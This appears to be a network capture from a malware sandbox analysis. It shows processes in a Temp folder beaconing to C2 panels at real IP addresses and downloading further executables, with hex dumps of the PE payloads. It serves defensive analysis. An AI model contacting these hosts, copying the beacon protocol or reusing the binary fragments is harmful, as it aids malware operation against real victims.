Jun 27, 2024 05:58:48.650131941 CEST	1236	IN	Data Raw: 44 24 08 01 74 0b 6a 18 56 e8 0b 5e 00 00 83 c4 08 8b c6 5e c2 04 00 56 8b f1 8d 46 34 c7 06 34 34 42 00 50 e8 b2 32 00 00 8d 46 0c 50 e8 a9 32 00 00 83 c4 08 c7 06 28 34 42 00 f6 44 24 08 01 74 0b 6a 6c 56 e8 cf 5d 00 00 83 c4 08 8b c6 5e c2 04 Data Ascii: D$tjV^^VF444BP2FP2(4BD$tjlV]^D$VX3BtjV]^D$VtjV]^VV@D$tjVW]^D$V(4BtjV*]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49730	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:50.082854033 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000035001&unit=246122658369
Jun 27, 2024 05:58:50.759172916 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49732	185.172.128.116	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:50.769735098 CEST	54	OUT	GET /NewLatest.exe HTTP/1.1 Host: 185.172.128.116
Jun 27, 2024 05:58:51.408123016 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:51 GMT Content-Type: application/octet-stream Content-Length: 424960 Last-Modified: Sun, 16 Jun 2024 06:41:45 GMT Connection: keep-alive ETag: "666e8929-67c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL)nf@@,K8l@.text `.rdata:@@.datae 4@.rsrc.@@.relocKL0@B
Jun 27, 2024 05:58:51.408138990 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 30 c1 44 00 e8 4a c5 01 00 59 c3 cc cc cc cc 68 d0 c0 44 00 e8 3a c5 01 00 59 Data Ascii: h0DJYhD:Yj hPE$,FnhDYj htE1FnhDYjhEl2FnhPDYj hE-FonhDYjhE1FOnhDY
Jun 27, 2024 05:58:51.408154964 CEST	448	IN	Data Raw: cc cc cc 6a 04 68 64 85 45 00 b9 6c 2f 46 00 e8 4f 6a 01 00 68 10 cf 44 00 e8 99 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 78 34 46 00 e8 2f 6a 01 00 68 70 cf 44 00 e8 79 c0 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 ec 30 46 00 e8 0f 6a Data Ascii: jhdEl/FOjhDYjhlEx4F/jhpDyYjhtE0FjhDYYjh\|E85Fih0D9YjhET2FihDYjhEFihDYjhEFihPDYjhE.Foi
Jun 27, 2024 05:58:51.408164978 CEST	1236	IN	Data Raw: cc cc cc 6a 04 68 fc 85 45 00 b9 ac 2b 46 00 e8 8f 68 01 00 68 50 d4 44 00 e8 d9 be 01 00 59 c3 cc cc cc 6a 04 68 04 86 45 00 b9 b4 2c 46 00 e8 6f 68 01 00 68 b0 d4 44 00 e8 b9 be 01 00 59 c3 cc cc cc 6a 04 68 0c 86 45 00 b9 c4 2e 46 00 e8 4f 68 Data Ascii: jhE+FhhPDYjhE,FohhDYjhE.FOhhDYjhE,F/hhpDyYjhEd1FhhDYYjh$E\|1Fgh0D9Yjh4EL.FghDYjh<E\*Fg
Jun 27, 2024 05:58:51.408175945 CEST	1236	IN	Data Raw: 68 90 e2 44 00 e8 19 ba 01 00 59 c3 cc cc cc 6a 40 68 e0 88 45 00 b9 fc 29 46 00 e8 af 63 01 00 68 f0 e2 44 00 e8 f9 b9 01 00 59 c3 cc cc cc 6a 50 68 28 89 45 00 b9 20 35 46 00 e8 8f 63 01 00 68 50 e3 44 00 e8 d9 b9 01 00 59 c3 cc cc cc 6a 10 68 Data Ascii: hDYj@hE)FchDYjPh(E 5FchPDYjh\|Et*FochDYj4hE3FOchDYjhE-F/chpDyYjPhET,FchDYYj@h0E5Fbh0D9Yjht
Jun 27, 2024 05:58:51.408186913 CEST	1236	IN	Data Raw: e8 4a b5 01 00 59 c3 cc cc cc cc 68 50 f2 44 00 e8 3a b5 01 00 59 c3 68 48 53 46 00 e8 21 9c 01 00 c7 04 24 06 f3 44 00 e8 22 b5 01 00 59 c3 6a 02 68 14 53 46 00 e8 4e a5 01 00 68 12 f3 44 00 e8 0a b5 01 00 83 c4 0c c3 68 1e f3 44 00 e8 fc b4 01 Data Ascii: JYhPD:YhHSF!$D"YjhSFNhDhDYDSFh\|DY UFhDYhDYjkY8ZFZFhZFEUVuu3^]uJSJ^]W}t
Jun 27, 2024 05:58:51.408196926 CEST	1236	IN	Data Raw: 08 83 c0 04 50 e8 d9 12 03 00 83 c4 08 c7 06 70 06 45 00 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 89 01 8b 45 0c 89 41 04 8b c1 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 55 0c 89 10 Data Ascii: PpE^]UEEA]UEUH]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]SUkl$jhD
Jun 27, 2024 05:58:51.408209085 CEST	1236	IN	Data Raw: e8 4e 55 01 00 5f 8b c6 5e 8b e5 5d c2 08 00 cc cc cc cc 55 8b ec f6 45 08 01 56 8b f1 74 0b 6a 08 56 e8 95 ab 01 00 83 c4 08 8b c6 5e 5d c2 04 00 cc cc 68 64 85 46 00 68 c0 92 41 00 68 58 85 46 00 e8 eb 93 01 00 83 c4 0c 85 c0 0f 84 cc 41 03 00 Data Ascii: NU_^]UEVtjV^]hdFhAhXFAdFUEu]PKU F3EVEENEQEWEPfTME3^v]UjhXDd
Jun 27, 2024 05:58:51.408219099 CEST	1236	IN	Data Raw: 01 00 8b f0 8d 5f 08 8b ce 33 c0 f0 0f b1 0b 85 c0 75 62 8b 07 8b cf ff 50 08 b9 03 00 00 00 8b c6 f0 0f b1 0b 3b c6 0f 45 f0 83 fe 02 75 46 8d 77 34 56 e8 f6 96 01 00 83 c4 04 85 c0 75 6a c6 47 64 01 56 c7 45 fc 02 00 00 00 e8 03 97 01 00 83 c4 Data Ascii: _3ubP;EuFw4VujGdVEuXGEP#uGEOHuPMdY_^[]PIPCP=P7P1UjhDdP F3ESVWPEd}sV
Jun 27, 2024 05:58:51.408245087 CEST	1236	IN	Data Raw: 45 f4 50 e8 b4 06 03 00 cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 84 05 45 00 66 0f d6 00 8b 45 08 83 c0 04 50 e8 39 04 03 00 83 c4 08 c7 06 e0 17 45 00 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 46 04 85 Data Ascii: EPUVWFPEfEP9E^]VFtAN+rP#+w#QPFFF^7UjhDdPV F3PEduuEN$t<PN$t;
Jun 27, 2024 05:58:51.413003922 CEST	1236	IN	Data Raw: cc cc cc cc cc cc cc 55 8b ec 6a ff 68 60 8a 44 00 64 a1 00 00 00 00 50 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 e8 6a 79 01 00 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 53 56 8b f1 57 Data Ascii: Ujh`DdP F3PEdjyMdY]USVWjFEPFfFFF}FDFLtG}E^PEESElC(jPCXC\tGECXE{\C`Cdt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49734	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:52.565658092 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000064001&unit=246122658369
Jun 27, 2024 05:58:53.244028091 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49739	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:54.899482965 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:58:55.552896976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:58:55.554173946 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:58:55.750155926 CEST	279	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 39 0d 0a 20 3c 63 3e 31 30 30 30 30 32 30 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 38 35 30 65 38 61 35 65 34 37 33 36 62 39 63 30 64 65 64 61 61 39 61 34 62 33 33 64 35 30 32 63 36 30 39 39 33 65 30 65 33 31 38 61 38 32 38 38 33 62 35 33 39 36 62 37 36 64 37 61 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 59 <c>1000020001+++a6d3917b850e8a5e4736b9c0dedaa9a4b33d502c60993e0e318a82883b5396b76d7a#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49740	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:55.999449015 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000091001&unit=246122658369
Jun 27, 2024 05:58:56.697757006 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49742	94.228.166.74	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:56.705786943 CEST	58	OUT	GET /wp-includes/ldr.exe HTTP/1.1 Host: 94.228.166.74
Jun 27, 2024 05:58:57.308932066 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:57 GMT Content-Type: application/octet-stream Content-Length: 424960 Last-Modified: Wed, 19 Jun 2024 12:58:24 GMT Connection: keep-alive ETag: "6672d5f0-67c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 d5 72 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELrf@@,K8l@.text `.rdata:@@.datae 4@.rsrc.@@.relocKL0@B
Jun 27, 2024 05:58:57.308964968 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 30 c1 44 00 e8 4a c5 01 00 59 c3 cc cc cc cc 68 d0 c0 44 00 e8 3a c5 01 00 59 Data Ascii: h0DJYhD:Yj hPE$,FnhDYj htE1FnhDYjhEl2FnhPDYj hE-FonhDYjhE1FOnhDY
Jun 27, 2024 05:58:57.308976889 CEST	1236	IN	Data Raw: cc cc cc 6a 04 68 64 85 45 00 b9 6c 2f 46 00 e8 4f 6a 01 00 68 10 cf 44 00 e8 99 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 78 34 46 00 e8 2f 6a 01 00 68 70 cf 44 00 e8 79 c0 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 ec 30 46 00 e8 0f 6a Data Ascii: jhdEl/FOjhDYjhlEx4F/jhpDyYjhtE0FjhDYYjh\|E85Fih0D9YjhET2FihDYjhEFihDYjhEFihPDYjhE.Foi
Jun 27, 2024 05:58:57.309091091 CEST	1236	IN	Data Raw: 68 50 dd 44 00 e8 d9 bb 01 00 59 c3 cc cc cc 6a 08 68 74 87 45 00 b9 fc 2f 46 00 e8 6f 65 01 00 68 b0 dd 44 00 e8 b9 bb 01 00 59 c3 cc cc cc 6a 08 68 80 87 45 00 b9 a4 33 46 00 e8 4f 65 01 00 68 10 de 44 00 e8 99 bb 01 00 59 c3 cc cc cc 6a 10 68 Data Ascii: hPDYjhtE/FoehDYjhE3FOehDYjhE.F/ehpDyYjhE4FehDYYjhE5Fdh0D9YjhE2FdhDYj@hE\-FdhDYjh
Jun 27, 2024 05:58:57.309103012 CEST	896	IN	Data Raw: 45 00 b9 bc 30 46 00 e8 af 60 01 00 68 f0 eb 44 00 e8 f9 b6 01 00 59 c3 cc cc cc 6a 08 68 f8 8b 45 00 b9 f4 2b 46 00 e8 8f 60 01 00 68 50 ec 44 00 e8 d9 b6 01 00 59 c3 cc cc cc 6a 14 68 04 8c 45 00 b9 2c 30 46 00 e8 6f 60 01 00 68 b0 ec 44 00 e8 Data Ascii: E0F`hDYjhE+F`hPDYjhE,0Fo`hDYj4hED-FO`hDYjhTE)F/`hpDyYjh\ED3F`hDYYjhxE,F_h0D9YjhE0F_hD
Jun 27, 2024 05:58:57.309114933 CEST	1236	IN	Data Raw: 08 8d 45 10 50 51 ff 75 0c e8 ad ff ff ff 83 c4 0c 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 14 20 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 84 05 45 00 50 66 0f d6 01 e8 a5 15 03 00 Data Ascii: EPQu]U F3EUEVUNEQWEPfM3^]UVWFPEfEPi^]AEPYI,EEUVFEPzEtjV
Jun 27, 2024 05:58:57.309128046 CEST	1236	IN	Data Raw: 45 c8 0f 43 45 c8 03 f0 56 e8 b9 1a 03 00 8b 45 e0 83 c4 0c c6 04 06 00 eb 10 c6 45 e0 00 ff 75 e0 51 8d 4d c8 e8 7d 67 01 00 8b 55 c4 83 fa 10 72 2c 8b 4d b0 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 cb 00 Data Ascii: ECEVEEuQM}gUr,MBrI#+RQuMME~EfEW}f~fGMCEGEPEEPMEqUpEr(MBrI#+wCRQKO
Jun 27, 2024 05:58:57.309144974 CEST	1236	IN	Data Raw: 50 e8 9e 0e 03 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 80 88 44 00 64 a1 00 00 00 00 50 56 a1 14 20 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 56 c7 45 fc 00 00 00 00 e8 49 8b 01 00 6a 14 56 e8 af a9 01 00 83 c4 0c 8b c6 Data Ascii: PUjhDdPV F3PEdVEIjVMdY^]UjhDdP F3EPEdEEWPfEEEEEEEPhAhTFEPt&q`FM
Jun 27, 2024 05:58:57.309396982 CEST	1236	IN	Data Raw: 03 83 f8 03 74 60 0f 57 c0 8d 77 34 66 0f 13 45 e8 56 89 75 e8 c6 45 ec 00 e8 50 95 01 00 83 c4 04 85 c0 75 6b c6 45 ec 01 c7 45 fc 02 00 00 00 8d 5f 0c 38 47 64 75 1a 0f 1f 80 00 00 00 00 56 53 e8 c5 8b 01 00 83 c4 08 85 c0 75 37 38 47 64 74 ed Data Ascii: t`Ww4fEVuEPukEE_8GduVSu78GdtVE4u0MdY_^[M35]PPPP0@0@0@0@Ujh@DdPQV F3PEdtAHuPM
Jun 27, 2024 05:58:57.309408903 CEST	1236	IN	Data Raw: 00 8b f8 83 c4 04 89 7d e4 c7 45 fc 00 00 00 00 89 7d ec c7 47 24 00 00 00 00 c6 45 fc 01 8b 4e 24 85 c9 74 08 8b 01 57 ff 10 89 47 24 c7 45 fc ff ff ff ff 83 fb ff 75 43 89 7d ec c7 45 fc 02 00 00 00 8b 4f 24 85 c9 0f 84 b8 00 00 00 8b 01 ff 50 Data Ascii: }E}G$EN$tWG$EuC}EO$PO$t;PRG$j(WnWfEBptFpMuEWh4@tMExE&t!Fu~OuPMd
Jun 27, 2024 05:58:57.313946009 CEST	1236	IN	Data Raw: 4e 48 83 cf ff c7 06 88 90 45 00 83 f9 02 74 0f 8b c7 f0 0f c1 41 04 48 75 05 8b 01 ff 50 04 8b 86 bc 00 00 00 85 c0 74 51 8b 8e c4 00 00 00 2b c8 83 e1 fc 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 a8 00 00 00 8b c2 Data Ascii: NHEtAHuPtQ+rP#+QP'tCuCuP^PC(PSFPvtFu~OuPMdY_^

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49748	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:58.426568985 CEST	180	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000108001&unit=246122658369
Jun 27, 2024 05:58:59.103020906 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jun 27, 2024 05:58:59.169019938 CEST	57	OUT	GET /lend/alex5555555.exe HTTP/1.1 Host: 77.91.77.81
Jun 27, 2024 05:58:59.442696095 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:59 GMT Content-Type: application/octet-stream Content-Length: 1822720 Last-Modified: Wed, 26 Jun 2024 15:53:49 GMT Connection: keep-alive ETag: "667c398d-1bd000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 93 d3 c8 40 f2 bd 9b 40 f2 bd 9b 40 f2 bd 9b 93 80 be 9a 51 f2 bd 9b 93 80 b8 9a e9 f2 bd 9b 93 80 b9 9a 56 f2 bd 9b 82 73 b9 9a 52 f2 bd 9b 93 80 bc 9a 47 f2 bd 9b 40 f2 bc 9b c6 f2 bd 9b 82 73 b8 9a 1c f2 bd 9b 82 73 be 9a 58 f2 bd 9b b3 70 b8 9a 41 f2 bd 9b b3 70 bf 9a 41 f2 bd 9b 52 69 63 68 40 f2 bd 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 31 eb 7b 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 12 02 00 00 ca 19 00 00 00 00 00 e8 96 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 1c 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@QVsRG@ssXpApARich@PEL1{f'0@ @P(!@0x.text `.BsSm `.rdataz0@@.data@.reloc(!"@B
Jun 27, 2024 05:58:59.442783117 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 f8 d2 5b 00 e8 09 53 00 00 68 52 13 42 00 e8 5d 89 00 00 59 c3 6a 08 b8 Data Ascii: [ShRB]YjBm[EX[Ee[h2BEhlBPhd[2]Mh\BjZBL[E[EeL[,7BEhBPh[\Mh_B
Jun 27, 2024 05:58:59.442797899 CEST	1236	IN	Data Raw: 42 00 c7 46 04 01 00 00 00 c7 46 08 00 00 00 00 c7 00 00 00 00 00 c7 40 04 00 00 00 00 e8 4a 59 00 00 8d 46 14 0f 57 c0 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 0f 11 40 0c 6a 02 66 0f d6 40 1c c7 40 24 00 00 00 00 50 c7 40 28 Data Ascii: BFF@JYFW@@@jf@@$P@(@,ZFDPYD$FlFpfFtFvFxd6BA$6BAI$^SUVWt$.06BEEEHt
Jun 27, 2024 05:58:59.442819118 CEST	672	IN	Data Raw: 79 83 ff 0f 77 21 57 ff 74 24 10 89 7b 10 53 c7 43 14 0f 00 00 00 e8 46 8f 00 00 83 c4 0c c6 04 1f 00 5f 5b c2 08 00 8b c7 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 89 44 24 10 8d 44 24 10 56 50 53 e8 3d ff Data Ascii: yw!Wt${SCF_[=v;BD$D$VPS=L$Wt$3V{K>^_[;Ujh@BdPSVW[3PEde]U+EC+=Hx}s++;v,u"
Jun 27, 2024 05:58:59.442832947 CEST	1236	IN	Data Raw: 00 00 8d 04 1e 8b 5d e0 3b c3 0f 43 d8 81 fb ff ff ff 3f 0f 87 0c 01 00 00 8d 04 9d 00 00 00 00 89 45 dc 89 5d ec 3d 00 10 00 00 72 2d 8d 48 23 3b c8 0f 86 ed 00 00 00 51 e8 a5 7a 00 00 83 c4 04 85 c0 0f 84 e6 00 00 00 8d 70 23 83 e6 e0 89 46 fc Data Ascii: ];C?E]=r-H#;Qzp#FMU"tPzE]MU3]uEEG;u+PQV+RQVKGU+PRQEt,O+r#P+w?Q
Jun 27, 2024 05:58:59.442847013 CEST	1236	IN	Data Raw: 00 00 8b 3d 70 d5 5b 00 8b 4c 24 64 8d 1c bd 00 00 00 00 8b 49 04 3b 79 0c 73 10 8b 41 08 8b 34 03 85 f6 0f 85 18 01 00 00 eb 02 33 f6 80 79 14 00 74 10 e8 1c 54 00 00 3b 78 0c 73 0e 8b 40 08 8b 34 03 85 f6 0f 85 f6 00 00 00 85 ed 74 15 8d 4c 24 Data Ascii: =p[L$dI;ysA43ytT;xs@4tL$[B_^][PjuD$d@txuxt3BjL$0A3D$0D$4D$8D$<D$@fD$DD$HfD$LD$PD$TD$XD$\toD$,WPhTD$
